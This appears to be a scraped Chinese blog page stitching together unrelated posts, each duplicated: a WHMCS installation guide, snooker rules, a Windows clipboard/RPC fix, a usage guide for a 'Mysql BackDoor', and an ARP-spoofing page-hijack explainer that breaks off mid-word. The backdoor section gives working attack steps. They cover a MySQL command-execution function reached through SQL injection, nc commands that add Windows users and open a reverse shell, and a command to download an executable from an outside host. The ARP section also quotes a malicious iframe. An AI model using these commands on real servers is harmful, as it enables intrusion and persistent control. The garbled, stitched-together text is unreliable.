0
2010/09/03 
21:49 
341
whmcs-系统简介
开发语言:PHP
安装环境:PHP+mySQL
授权协议:商业授权,需付费使用
中文支持:可制作中文语言包
WHMCS是当今国外非常流行的服务器空间客户管理系统,可以完美配合cPanel/WHM/DirectAdmin/Plesk等主流主机管理软件使用,提供在线订购、网上支付、客户支持等各种常用功能。
安装whmcs你需要有php和mysql的环境,另外你还需要有以下环境支持:
Curl Support (with SSL support)
GD Image Library
ionCube Loaders
这里将我在windows+iis环境下的安装记录下,由于我的环境中缺少Curl Support (with SSL support) 和ionCube Loaders
先说 Curl Support (with SSL support)
1、把PHP的ext目录和目录下的ssleay32.dll,libeay32.dll copy到系统目录下,建议是system32
2、检查ext目录下确实存在php_curl.dll
3、检查php.exe, php5ts.dll和php_curl.dll的版本相同
4、接着打开你的php.ini,做如下修改:
1.extension_dir改成你的ext目录
2.去掉cgi.force_redirect的分号注释符,且修改值为0
3.找到 php_curl去掉注释符
这样就大功告成了。开始测试吧。phpinfo中cURL support 的值为enabled,就说明:你成功了!
再说 ionCube Loaders 的配置:
1,先到下面的地址下载:
http://downloads.ioncube.com/loader_downloads/ioncube_loaders_win_x86.zip (zip版)
2,解压ioncube_loaders_win_x86.zip到你想安装的目录
3,复制目录里的几个PHP文件到你的WEB目录
4,执行安装http://yourip/path/ioncube-loader-helper.php
注:ioncube-loader-helper.php是你从ioncube里copy过来的
5,在刚才打开的页面里有三个连接,你点第二个(run-time loading installation instructions)进行安装,安装成功没成功会在点完后打开的页面的告诉你的 看下就知道了
6,如果成功了,点后退,再点页面里的第一个连接(php.ini installation instructions)来看你的PHP等的一些信息,同样也有告诉你下一步应该如何去做
7,在php.ini中加上一句:zend_extension_ts =c:\Program Files\ioncube\ioncube_loader_win_5.2.dll (这行代码是在第4步中运行ioncube-loader-helper.php 这个文件中提示的。)
然后重启iis
ionCube安装完成。
好了,到此,就可以安装whmcs了。
开发语言:PHP
安装环境:PHP+mySQL
授权协议:商业授权,需付费使用
中文支持:可制作中文语言包
WHMCS是当今国外非常流行的服务器空间客户管理系统,可以完美配合cPanel/WHM/DirectAdmin/Plesk等主流主机管理软件使用,提供在线订购、网上支付、客户支持等各种常用功能。
安装whmcs你需要有php和mysql的环境,另外你还需要有以下环境支持:
Curl Support (with SSL support)
GD Image Library
ionCube Loaders
这里将我在windows+iis环境下的安装记录下,由于我的环境中缺少Curl Support (with SSL support) 和ionCube Loaders
先说 Curl Support (with SSL support)
1、把PHP的ext目录和目录下的ssleay32.dll,libeay32.dll copy到系统目录下,建议是system32
2、检查ext目录下确实存在php_curl.dll
3、检查php.exe, php5ts.dll和php_curl.dll的版本相同
4、接着打开你的php.ini,做如下修改:
1.extension_dir改成你的ext目录
2.去掉cgi.force_redirect的分号注释符,且修改值为0
3.找到 php_curl去掉注释符
这样就大功告成了。开始测试吧。phpinfo中cURL support 的值为enabled,就说明:你成功了!
再说 ionCube Loaders 的配置:
1,先到下面的地址下载:
http://downloads.ioncube.com/loader_downloads/ioncube_loaders_win_x86.zip (zip版)
2,解压ioncube_loaders_win_x86.zip到你想安装的目录
3,复制目录里的几个PHP文件到你的WEB目录
4,执行安装http://yourip/path/ioncube-loader-helper.php
注:ioncube-loader-helper.php是你从ioncube里copy过来的
5,在刚才打开的页面里有三个连接,你点第二个(run-time loading installation instructions)进行安装,安装成功没成功会在点完后打开的页面的告诉你的 看下就知道了
6,如果成功了,点后退,再点页面里的第一个连接(php.ini installation instructions)来看你的PHP等的一些信息,同样也有告诉你下一步应该如何去做
7,在php.ini中加上一句:zend_extension_ts =c:\Program Files\ioncube\ioncube_loader_win_5.2.dll (这行代码是在第4步中运行ioncube-loader-helper.php 这个文件中提示的。)
然后重启iis
ionCube安装完成。
好了,到此,就可以安装whmcs了。
一、基本规则
1、斯诺克台球球台内沿长350厘米,内沿宽175厘米,高85厘米。22个彩球共分8种颜色,红色球1 5个(1分),黄色球1个(2分),绿色球1个(3分),棕色球1个(4分),蓝色球1个(5分),粉色球1个(6分),黑色球一个(7分),白色球1个(主球)。
2、开球前主球可在开球区(D型区)内任选一点位置。开球必须首先直接或间接击中红球。按照击落一个红球再击落一个彩球的顺序直至红球全部落袋。其中彩球落袋后放回原置球点。然后按照彩色球的分值从低到高依次为黄、绿、棕、蓝、粉、黑色球击落袋中。
3、当台面上只剩下黑球时,击球入袋或犯规都会使比赛结束,这时如果双方比分相等则重新放置黑球,进行决胜期比赛,此时无论谁击球入袋或犯规都使比赛结束。
4、遇有下列犯规行为,应判罚分(分值小于4分按4分罚分,大于4分按自身的分值罚分):球未停稳就击球;击球时杆头触击主球一次以上;击成空杆;主球击目标球后自落;击球时双脚离地,开球时主球未放入开球区(D型区);击成跳球;击球出界;主球首先撞击非活球;击球时,球员的衣服、身体、球杆及佩戴物等触动台面上的球。
5、下列犯规判罚7分:击红球入袋后,尚未指定球就开始击球;击进红球后,未报彩球又击打红球;不使用白球而使用其他任何一个球作主球。
二、斯诺克基本玩法和胜负决定
斯诺克共用球22个,其中15个红球,6个彩球(黑、粉、蓝、棕、绿、黄各1个)和1个白球。红球和彩球用来得分,白球用来击打红球和彩球。每次开始之前,将球摆如图1的形式。开球前,双方可以通过抛硬币来决定谁先开球。在开球时,开球一方,可将白球摆在开球区的任何位置,去打击红球。其后,白球停在什么位置,就必须接着由什么位置打起。每一方必须先打入一个红球,然后任选一个有利的彩球打。打入彩球后,需将彩球取出重新摆回其自己的原位点上(即开球前,其所在的位置上)。接着,再打红球,打彩球,如此反复,直到所有红球入袋。之后,就必须按照一定顺序打彩球。就是说,先打黄球,再打绿球、棕球、蓝球、粉球和黑球。此时,进一个彩球,台面上就少一个彩球(不再需要将入袋彩球取出摆回自己的原位点上),直以所有彩球入袋,台面上中剩下白球,就宣告结束。
从开始到所有彩球和红球被击打入袋这么一个过程称为一局。在整个进球过程中,一方如果没有能够成功进球,或者打了一个坏球,此时他就得让位于另一方打。连续成功进球的过程叫“一杆”。
1、斯诺克台球球台内沿长350厘米,内沿宽175厘米,高85厘米。22个彩球共分8种颜色,红色球1 5个(1分),黄色球1个(2分),绿色球1个(3分),棕色球1个(4分),蓝色球1个(5分),粉色球1个(6分),黑色球一个(7分),白色球1个(主球)。
2、开球前主球可在开球区(D型区)内任选一点位置。开球必须首先直接或间接击中红球。按照击落一个红球再击落一个彩球的顺序直至红球全部落袋。其中彩球落袋后放回原置球点。然后按照彩色球的分值从低到高依次为黄、绿、棕、蓝、粉、黑色球击落袋中。
3、当台面上只剩下黑球时,击球入袋或犯规都会使比赛结束,这时如果双方比分相等则重新放置黑球,进行决胜期比赛,此时无论谁击球入袋或犯规都使比赛结束。
4、遇有下列犯规行为,应判罚分(分值小于4分按4分罚分,大于4分按自身的分值罚分):球未停稳就击球;击球时杆头触击主球一次以上;击成空杆;主球击目标球后自落;击球时双脚离地,开球时主球未放入开球区(D型区);击成跳球;击球出界;主球首先撞击非活球;击球时,球员的衣服、身体、球杆及佩戴物等触动台面上的球。
5、下列犯规判罚7分:击红球入袋后,尚未指定球就开始击球;击进红球后,未报彩球又击打红球;不使用白球而使用其他任何一个球作主球。
二、斯诺克基本玩法和胜负决定
斯诺克共用球22个,其中15个红球,6个彩球(黑、粉、蓝、棕、绿、黄各1个)和1个白球。红球和彩球用来得分,白球用来击打红球和彩球。每次开始之前,将球摆如图1的形式。开球前,双方可以通过抛硬币来决定谁先开球。在开球时,开球一方,可将白球摆在开球区的任何位置,去打击红球。其后,白球停在什么位置,就必须接着由什么位置打起。每一方必须先打入一个红球,然后任选一个有利的彩球打。打入彩球后,需将彩球取出重新摆回其自己的原位点上(即开球前,其所在的位置上)。接着,再打红球,打彩球,如此反复,直到所有红球入袋。之后,就必须按照一定顺序打彩球。就是说,先打黄球,再打绿球、棕球、蓝球、粉球和黑球。此时,进一个彩球,台面上就少一个彩球(不再需要将入袋彩球取出摆回自己的原位点上),直以所有彩球入袋,台面上中剩下白球,就宣告结束。
从开始到所有彩球和红球被击打入袋这么一个过程称为一局。在整个进球过程中,一方如果没有能够成功进球,或者打了一个坏球,此时他就得让位于另一方打。连续成功进球的过程叫“一杆”。
在粘贴时如果程序无法响应,当强制终止该进程后,就有可能出现系统不停的调用剪贴板内容,使得剪贴板锁定,从而用户无法再从剪贴板中获得之前复制或剪切的内容,所以出现无法粘贴的情况。
具体情况是:复制文件后,右键粘贴时粘贴命令是灰色不可用(CTRL+C,CTRL+V也同样无效)。在编辑菜单中也无法操作。只能使用发送至。但在安全模式下可以使用复制粘贴。
出现这种情况后,使用“clipbrd”打开“剪贴板监视器”也无法清空剪贴板,反而需要强制终止剪贴板进程。
在经过多次实验后发现一种解决方法:
打开“360安全卫士”,选择“清除使用痕迹”,然后勾选“系统剪贴板”,最后点击“立即清除”即可。
但实际操作后发现这种方法并不灵光,于是又到网上搜刮了一下,才明白是因为RPC服务没有正常启动。
网上给出了三个解决方案:
方法一:修改注册表法
点击“开始→运行”,键入“Regedit”打开“注册表编辑器”,展开分支“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RpcSs”,将Start项的值修改为“00000002”,重新启动系统即可。
方法二:使用sc.exe命令
点击“开始→运行”,键入“cmd”进入“命令提示符”窗口,键入“sc config RpcSs start= auto”(auto前有空格)命令,系统会显示“SC ChangeServiceConfig SUCCESS”,这样就可以成功启动RPC服务。
注意:要想使用“sc”命令必须安装Windows 2000/2003 Resource Kit(资源工具包),否则使用该命令无效。
方法三:使用故障恢复控制台
以Windows XP系统为例,在光驱中放入安装光盘,并且在BIOS参数中设置为从CD-ROM启动;启动电脑后,系统进入到Windows XP安装界面,按下“R”键登录到故障恢复控制台。在故障恢复控制台下,键入“enable RpcSs service_auto_start”命令,然后再键入“exit”命令,重新启动系统,以正常模式登录,即可成功启动RPC服务。
注意:“Enable”是故障恢复控制台提供的一个用来启动系统服务和设备驱动程序的命令,只能在故障恢复控制台下使用。
我测试了一下第二种方法,确实管用!
具体情况是:复制文件后,右键粘贴时粘贴命令是灰色不可用(CTRL+C,CTRL+V也同样无效)。在编辑菜单中也无法操作。只能使用发送至。但在安全模式下可以使用复制粘贴。
出现这种情况后,使用“clipbrd”打开“剪贴板监视器”也无法清空剪贴板,反而需要强制终止剪贴板进程。
在经过多次实验后发现一种解决方法:
打开“360安全卫士”,选择“清除使用痕迹”,然后勾选“系统剪贴板”,最后点击“立即清除”即可。
但实际操作后发现这种方法并不灵光,于是又到网上搜刮了一下,才明白是因为RPC服务没有正常启动。
网上给出了三个解决方案:
方法一:修改注册表法
点击“开始→运行”,键入“Regedit”打开“注册表编辑器”,展开分支“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RpcSs”,将Start项的值修改为“00000002”,重新启动系统即可。
方法二:使用sc.exe命令
点击“开始→运行”,键入“cmd”进入“命令提示符”窗口,键入“sc config RpcSs start= auto”(auto前有空格)命令,系统会显示“SC ChangeServiceConfig SUCCESS”,这样就可以成功启动RPC服务。
注意:要想使用“sc”命令必须安装Windows 2000/2003 Resource Kit(资源工具包),否则使用该命令无效。
方法三:使用故障恢复控制台
以Windows XP系统为例,在光驱中放入安装光盘,并且在BIOS参数中设置为从CD-ROM启动;启动电脑后,系统进入到Windows XP安装界面,按下“R”键登录到故障恢复控制台。在故障恢复控制台下,键入“enable RpcSs service_auto_start”命令,然后再键入“exit”命令,重新启动系统,以正常模式登录,即可成功启动RPC服务。
注意:“Enable”是故障恢复控制台提供的一个用来启动系统服务和设备驱动程序的命令,只能在故障恢复控制台下使用。
我测试了一下第二种方法,确实管用!
Mysql BackDoor是一款针对PHP+Mysql服务器开发的后门,后门安装后为Mysql增加一个可以执行系统命令的"state"函数,并且随 Mysql进程启动一个基于Dll的嗅探型后门,从而巧妙地实现了无端口,无进程,无服务的穿墙安全.程序在WINXP、 WIN2003+MYSQL5.0.X下通过.
[安装]
将Mysql.php传到PHP服务器上,依填上相应的Host、User、Password、DB后,点击"自动安装Mysql BackDoor"
安装成功后,Mysql上便会增加一个"state"函数,同时利用Mysql进程运行一个基于嗅探的后门. 这个后门在Windows下拥有与Mysql一样的系统权限.
[使用state函数]
State函数实际是一个和PHP的”system()”功能相同的函数,可以用来执行系统命令.在”请输入SQL命令:”处填写要执行的mysql语 句,如” select state("net user nohack /add")”,点击”执行SQL语句”后,便会得到运行结果.
[使用基于Sniff的后门]
有了state函数,即使WebShell丢了,只要服务器上有SQL注入点,我们就能通过注入".php?id=1 and state('net user')"的方法在服务器上执行命令.但是如果注入点都没有了呢?我们仍然调用基于Sniff的后门控制服务器.向服务器开放的任意端口发送 以"Mysql-"开头的数据包,便能调用这个Sniff的后门,如:
1.运行系统命令: nc ip 80->回车->Mysql-cmd /c net user abc /add>c:/log.txt! (注意:最后的"!"不可省略)
2.让服务器反弹Shell到本机20082端口:先运行nc –lp 20082监听本机的20082端口,再nc ip 80->回车->Mysql-c-->回车
3.让服务器下载文件:nc ip 80->回车->Mysql-http://www.x.com/door.exe -c mydoor.exe! (注意:最后的"!"不可省略)
除了发送"Mysql-c-”,其他的命令是没有回显的,但相应的命令已经在服务器上运行了.
[安装]
将Mysql.php传到PHP服务器上,依填上相应的Host、User、Password、DB后,点击"自动安装Mysql BackDoor"
安装成功后,Mysql上便会增加一个"state"函数,同时利用Mysql进程运行一个基于嗅探的后门. 这个后门在Windows下拥有与Mysql一样的系统权限.
[使用state函数]
State函数实际是一个和PHP的”system()”功能相同的函数,可以用来执行系统命令.在”请输入SQL命令:”处填写要执行的mysql语 句,如” select state("net user nohack /add")”,点击”执行SQL语句”后,便会得到运行结果.
[使用基于Sniff的后门]
有了state函数,即使WebShell丢了,只要服务器上有SQL注入点,我们就能通过注入".php?id=1 and state('net user')"的方法在服务器上执行命令.但是如果注入点都没有了呢?我们仍然调用基于Sniff的后门控制服务器.向服务器开放的任意端口发送 以"Mysql-"开头的数据包,便能调用这个Sniff的后门,如:
1.运行系统命令: nc ip 80->回车->Mysql-cmd /c net user abc /add>c:/log.txt! (注意:最后的"!"不可省略)
2.让服务器反弹Shell到本机20082端口:先运行nc –lp 20082监听本机的20082端口,再nc ip 80->回车->Mysql-c-->回车
3.让服务器下载文件:nc ip 80->回车->Mysql-http://www.x.com/door.exe -c mydoor.exe! (注意:最后的"!"不可省略)
除了发送"Mysql-c-”,其他的命令是没有回显的,但相应的命令已经在服务器上运行了.
---------------权威资料看这里---------------
清华大学信息网络工程研究中心-中国教育和科研计算机网应急响应组
《ARP 欺骗网页劫持攻击分析》PDF文件,直接IE打开或者另存为查看http://202.203.128.31/manage/upload/attach/11975323420.pdf
---------------民间资料看这里---------------
网站突然出现访问迟钝,并且打开之后杀毒软件立即提示含有木马病毒,IE提示下载安装Microsoft Data Access...信息。从IE查看页面的源代码,在网页的源代码中加入了<iframe src=http://xf.jebooo.com/t.htm width=0
height=0></iframe> 嵌套框架网页,该网页执行木马程序......
所以估计是服务器被人攻陷了,所有文件代码被加了此行代码,于是FTP上去,但下载文件下来查看却没有该代码。怎么回事呢?原来是机房局域网中有服务器中ARP病毒了,模拟网关进行欺骗,拦截Http数据包自动加入iframe代码。
那么什么是"ARP欺骗"呢?
首先,ARP的意思是Address Resolution Protocol(地址解析协议),它是一个位于TCP/IP协议栈中的低层协议,负责将某个IP地址解析成对应的MAC地址。
从影响网络连接通畅的方式来看,ARP欺骗分为二种,一种是对路由器ARP表的欺骗;另一种是对内网PC的网关欺骗。
第一种ARP欺骗的原理是----截获网关数据。它通知路由器一系列错误的内网MAC地址,并按照一定的频率不断进行,使真实的地址信息无法通过更新保存在路由器中,结果路由器的所有数据只能发送给错误的MAC地址,造成正常PC
无法收到信息。
第二种ARP欺骗的原理是----伪造网关,ARP网关欺骗。它的原理是建立假网关,让被它欺骗的PC向假网关发数据,而不是通过正常的路由器途径上网。在PC看来,就是上不了网了,"网络掉线了"。
ARP欺骗木马只需成功感染一台电脑,就可能导致整个局域网都无法上网,严重的甚至可能带来整个网络的瘫痪。
而本次我的网站服务器所在的托管机房同一局域网中的某台服��设置好你的路由,确保ip地址能到达合法的路径。(静态配置路由ARP条目),注意,使用交换集线器和网桥无法阻止ARP欺骗。
7、管理员定期用响应的ip包中获得一个rarp请求,然后检查ARP响应的真实性。
8、管理员定期轮询,检查主机上的ARP缓存。
9、使用防火墙连续监控网络。注意有使用SNMP的情况下,ARP的欺骗有可能导致陷阱包丢失。
清华大学信息网络工程研究中心-中国教育和科研计算机网应急响应组
《ARP 欺骗网页劫持攻击分析》PDF文件,直接IE打开或者另存为查看http://202.203.128.31/manage/upload/attach/11975323420.pdf
---------------民间资料看这里---------------
网站突然出现访问迟钝,并且打开之后杀毒软件立即提示含有木马病毒,IE提示下载安装Microsoft Data Access...信息。从IE查看页面的源代码,在网页的源代码中加入了<iframe src=http://xf.jebooo.com/t.htm width=0
height=0></iframe> 嵌套框架网页,该网页执行木马程序......
所以估计是服务器被人攻陷了,所有文件代码被加了此行代码,于是FTP上去,但下载文件下来查看却没有该代码。怎么回事呢?原来是机房局域网中有服务器中ARP病毒了,模拟网关进行欺骗,拦截Http数据包自动加入iframe代码。
那么什么是"ARP欺骗"呢?
首先,ARP的意思是Address Resolution Protocol(地址解析协议),它是一个位于TCP/IP协议栈中的低层协议,负责将某个IP地址解析成对应的MAC地址。
从影响网络连接通畅的方式来看,ARP欺骗分为二种,一种是对路由器ARP表的欺骗;另一种是对内网PC的网关欺骗。
第一种ARP欺骗的原理是----截获网关数据。它通知路由器一系列错误的内网MAC地址,并按照一定的频率不断进行,使真实的地址信息无法通过更新保存在路由器中,结果路由器的所有数据只能发送给错误的MAC地址,造成正常PC
无法收到信息。
第二种ARP欺骗的原理是----伪造网关,ARP网关欺骗。它的原理是建立假网关,让被它欺骗的PC向假网关发数据,而不是通过正常的路由器途径上网。在PC看来,就是上不了网了,"网络掉线了"。
ARP欺骗木马只需成功感染一台电脑,就可能导致整个局域网都无法上网,严重的甚至可能带来整个网络的瘫痪。
而本次我的网站服务器所在的托管机房同一局域网中的某台服��设置好你的路由,确保ip地址能到达合法的路径。(静态配置路由ARP条目),注意,使用交换集线器和网桥无法阻止ARP欺骗。
7、管理员定期用响应的ip包中获得一个rarp请求,然后检查ARP响应的真实性。
8、管理员定期轮询,检查主机上的ARP缓存。
9、使用防火墙连续监控网络。注意有使用SNMP的情况下,ARP的欺骗有可能导致陷阱包丢失。
